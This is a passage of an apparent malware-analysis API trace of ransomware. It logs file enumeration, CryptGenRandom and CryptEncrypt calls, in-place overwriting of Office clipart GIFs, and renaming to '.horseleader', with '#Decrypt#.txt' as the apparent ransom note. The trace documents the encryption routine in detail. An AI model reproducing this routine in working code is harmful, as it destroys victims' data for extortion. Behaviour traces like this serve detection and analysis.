(lpFirst="AG00129_.GIF", lpSrch=".horseleader") returned 0x0 [0252.438] lstrcmpW (lpString1="AG00129_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.438] lstrcmpW (lpString1="AG00129_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.438] lstrlenW (lpString=".testttjffg") returned 11 [0252.438] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.438] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.438] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.438] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.439] lstrlenW 
(lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 67 [0252.439] StrStrW (lpFirst="AG00129_.GIF", lpSrch=".txt") returned 0x0 [0252.439] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=12482) returned 1 [0252.439] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x30c2, lpOverlapped=0x0) returned 1 [0252.441] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffcf3e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.441] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x30c2, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x30c2, lpOverlapped=0x0) returned 1 [0252.442] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.442] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.442] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.442] CloseHandle (hObject=0x158) returned 1 [0252.442] GetProcessHeap () returned 0x780000 [0252.443] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.443] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.horseleader") returned 79 [0252.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif.horseleader")) returned 1 [0252.444] GetProcessHeap () returned 0x780000 [0252.444] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.444] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xffa86700, ftCreationTime.dwHighDateTime=0x1bd50ae, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xffa86700, ftLastWriteTime.dwHighDateTime=0x1bd50ae, nFileSizeHigh=0x0, nFileSizeLow=0x1485, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00130_.GIF", cAlternateFileName="")) returned 1 [0252.444] lstrcmpiW (lpString1="AG00130_.GIF", lpString2="Windows") returned -1 [0252.444] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 67 [0252.444] StrStrIW (lpFirst="AG00130_.GIF", lpSrch=".horseleader") returned 0x0 [0252.444] lstrcmpW (lpString1="AG00130_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.444] lstrcmpW (lpString1="AG00130_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.444] lstrlenW (lpString=".testttjffg") returned 11 [0252.444] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.444] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.444] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.444] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.445] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 67 [0252.445] StrStrW (lpFirst="AG00130_.GIF", lpSrch=".txt") returned 0x0 [0252.445] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5253) returned 1 [0252.445] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1485, lpOverlapped=0x0) returned 1 [0252.447] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffeb7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.447] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1485, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1485, lpOverlapped=0x0) returned 1 [0252.447] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.447] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.447] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.448] CloseHandle 
(hObject=0x158) returned 1 [0252.448] GetProcessHeap () returned 0x780000 [0252.448] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.448] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.horseleader") returned 79 [0252.448] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif.horseleader")) returned 1 [0252.448] GetProcessHeap () returned 0x780000 [0252.449] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.449] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9b28600, ftCreationTime.dwHighDateTime=0x1bd50ae, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf9b28600, ftLastWriteTime.dwHighDateTime=0x1bd50ae, nFileSizeHigh=0x0, nFileSizeLow=0xa24, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00135_.GIF", cAlternateFileName="")) returned 1 [0252.449] lstrcmpiW (lpString1="AG00135_.GIF", lpString2="Windows") returned -1 [0252.449] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 67 [0252.449] StrStrIW (lpFirst="AG00135_.GIF", lpSrch=".horseleader") returned 0x0 [0252.449] lstrcmpW (lpString1="AG00135_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.449] lstrcmpW (lpString1="AG00135_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.449] lstrlenW 
(lpString=".testttjffg") returned 11 [0252.449] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.449] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.449] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.449] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.453] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 67 [0252.453] StrStrW (lpFirst="AG00135_.GIF", lpSrch=".txt") returned 0x0 [0252.453] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2596) returned 1 [0252.453] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xa24, lpOverlapped=0x0) returned 1 [0252.455] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff5dc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.455] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xa24, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xa24, lpOverlapped=0x0) returned 1 [0252.456] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.456] WriteFile (in: hFile=0x158, 
lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.456] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.456] CloseHandle (hObject=0x158) returned 1 [0252.456] GetProcessHeap () returned 0x780000 [0252.456] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.456] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.horseleader") returned 79 [0252.456] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00135_.gif.horseleader")) returned 1 [0252.457] GetProcessHeap () returned 0x780000 [0252.458] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.458] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3bca500, ftCreationTime.dwHighDateTime=0x1bd50ae, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3bca500, ftLastWriteTime.dwHighDateTime=0x1bd50ae, nFileSizeHigh=0x0, nFileSizeLow=0x296f, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00139_.GIF", cAlternateFileName="")) returned 1 [0252.458] lstrcmpiW (lpString1="AG00139_.GIF", lpString2="Windows") returned -1 [0252.458] 
wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 67 [0252.458] StrStrIW (lpFirst="AG00139_.GIF", lpSrch=".horseleader") returned 0x0 [0252.458] lstrcmpW (lpString1="AG00139_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.458] lstrcmpW (lpString1="AG00139_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.458] lstrlenW (lpString=".testttjffg") returned 11 [0252.458] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.458] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.459] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.459] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.460] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 67 [0252.460] StrStrW (lpFirst="AG00139_.GIF", lpSrch=".txt") returned 0x0 [0252.460] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=10607) returned 1 [0252.461] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x296f, lpOverlapped=0x0) returned 1 [0252.463] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd691, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 
returned 1 [0252.464] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x296f, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x296f, lpOverlapped=0x0) returned 1 [0252.464] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.464] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.464] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.464] CloseHandle (hObject=0x158) returned 1 [0252.465] GetProcessHeap () returned 0x780000 [0252.465] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.465] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.horseleader") returned 79 [0252.465] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif.horseleader")) returned 1 [0252.467] GetProcessHeap () returned 0x780000 [0252.467] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.467] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedc6c400, 
ftCreationTime.dwHighDateTime=0x1bd50ae, ftLastAccessTime.dwLowDateTime=0x5eb42550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xedc6c400, ftLastWriteTime.dwHighDateTime=0x1bd50ae, nFileSizeHigh=0x0, nFileSizeLow=0x3bcc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00142_.GIF", cAlternateFileName="")) returned 1 [0252.467] lstrcmpiW (lpString1="AG00142_.GIF", lpString2="Windows") returned -1 [0252.467] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 67 [0252.467] StrStrIW (lpFirst="AG00142_.GIF", lpSrch=".horseleader") returned 0x0 [0252.467] lstrcmpW (lpString1="AG00142_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.467] lstrcmpW (lpString1="AG00142_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.467] lstrlenW (lpString=".testttjffg") returned 11 [0252.467] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.467] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.468] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.468] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.468] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF") returned 67 [0252.468] StrStrW (lpFirst="AG00142_.GIF", lpSrch=".txt") returned 0x0 [0252.469] GetFileSizeEx (in: hFile=0x158, 
lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=15308) returned 1 [0252.469] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3bcc, lpOverlapped=0x0) returned 1 [0252.471] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc434, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.471] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3bcc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3bcc, lpOverlapped=0x0) returned 1 [0252.472] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.472] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.472] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.472] CloseHandle (hObject=0x158) returned 1 [0252.473] GetProcessHeap () returned 0x780000 [0252.473] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.473] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF.horseleader") returned 79 [0252.473] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00142_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\AG00142_.GIF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00142_.gif.horseleader")) returned 1 [0252.474] GetProcessHeap () returned 0x780000 [0252.474] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.474] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9688900, ftCreationTime.dwHighDateTime=0x1bd4c12, ftLastAccessTime.dwLowDateTime=0x51317770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb9688900, ftLastWriteTime.dwHighDateTime=0x1bd4c12, nFileSizeHigh=0x0, nFileSizeLow=0x14c3, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AG00154_.GIF", cAlternateFileName="")) returned 1 [0252.474] lstrcmpiW (lpString1="AG00154_.GIF", lpString2="Windows") returned -1 [0252.474] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 67 [0252.475] StrStrIW (lpFirst="AG00154_.GIF", lpSrch=".horseleader") returned 0x0 [0252.475] lstrcmpW (lpString1="AG00154_.GIF", lpString2="#Decrypt#.txt") returned 1 [0252.475] lstrcmpW (lpString1="AG00154_.GIF", lpString2="_uninstalling_.png") returned 1 [0252.475] lstrlenW (lpString=".testttjffg") returned 11 [0252.475] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF", lpSrch=".testttjffg") returned 0x0 [0252.475] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.475] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.475] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" 
(normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.476] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 67 [0252.476] StrStrW (lpFirst="AG00154_.GIF", lpSrch=".txt") returned 0x0 [0252.476] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5315) returned 1 [0252.476] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x14c3, lpOverlapped=0x0) returned 1 [0252.479] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffeb3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.479] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x14c3, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x14c3, lpOverlapped=0x0) returned 1 [0252.479] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.480] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.480] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, 